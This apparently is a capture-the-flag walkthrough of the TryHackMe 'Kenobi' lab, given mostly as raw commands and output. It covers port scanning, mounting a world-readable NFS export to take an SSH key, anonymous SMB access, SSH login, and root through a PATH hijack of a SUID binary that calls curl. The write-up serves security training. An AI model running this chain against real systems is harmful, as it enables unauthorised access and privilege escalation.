nmap -p- --min-rate 100 --max-retries 2 -Pn 10.10.10.10 -v
Discovered open port 80/tcp on 10.10.10.10
Discovered open port 111/tcp on 10.10.10.10
Discovered open port 445/tcp on 10.10.10.10
Discovered open port 139/tcp on 10.10.10.10
Discovered open port 22/tcp on 10.10.10.10
Discovered open port 36263/tcp on 10.10.10.10
Discovered open port 58087/tcp on 10.10.10.10
nmap -A -p22,80,111,139,445,36263,58087 10.10.10.10
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b:68:55:83:8d:12:74:5b:55:12:ac:cb:76:1c:04:c2 (RSA)
| 256 c5:26:6a:94:4f:74:3a:55:00:b1:9f:d1:bc:77:de:42 (ECDSA)
|_ 256 e7:60:61:ca:d0:30:26:2e:cb:ea:61:04:5d:49:f0:d4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 58087/tcp mountd
| 100021 1,3,4 37297/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
36263/tcp open mountd 1-3 (RPC #100005)
58087/tcp open mountd 1-3 (RPC #100005)showmount -e 10.10.10.10
Export list for 10.10.10.10:
/var *
┌──(root㉿root)-[~/Desktop/THM/Kenobi]
└─$ mkdir /tmp/nfs
┌──(root㉿root)-[~/Desktop/THM/Kenobi]
└─$ sudo mount -t nfs 10.10.10.10:/var /tmp/nfs
┌──(root㉿root)-[~/Desktop/THM/Kenobi]
└─$ ls -la /tmp/nfs
total 52
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxrwxrwt 20 root root 480 Jan 4 15:02 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 15 root root 4096 Aug 10 12:18 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 51 root root 4096 Aug 10 12:18 lib
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 13 root lpadmin 4096 Jan 4 14:57 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 5 root root 4096 Aug 9 19:08 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 8 root root 4096 Jan 4 15:03 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www┌──(root㉿root)-[/tmp/nfs/tmp]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4PeD0e0522UEj7xlrLmN68R6iSG3HMK/aTI812CTtzM9gnXs
... [REDACTED FOR SECURITY] ...
-----END RSA PRIVATE KEY-----
┌──(root㉿root)-[/tmp/nfs/tmp]
└─$ cp id_rsa ~/Desktop/THM/Kenobi smbclient -L //10.10.10.10/
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.10.10.10 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
smbclient //10.10.10.10/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 16:19:09 2019
.. D 0 Sat Aug 9 18:33:22 2025
log.txt N 12237 Wed Sep 4 16:19:09 2019
9183416 blocks of size 1024. 2918336 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (37.5 KiloBytes/sec) (average 37.5 KiloBytes/sec)
smb: \> I got the username as kenobi & I logged in through ssh via id_rsa also got the user flag
ssh kenobi@10.10.10.10 -i id_rsa
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
THM{REDACTED}find / -perm -u=s -type f 2>/dev/null
/usr/bin/menu # GOT THIS BINARY WHICH IS RUN BY ROOT
ls -la /usr/bin/menu
-rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menustrings /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
Invalid choiceecho "/bin/sh">/tmp/curl
chmod 777 /tmp/curl
export PATH=/tmp:$PATH
echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binkenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# whoami
root
# cat /root/root.txt
THM{REDACTED}
# /var share was exposed to everyone (*)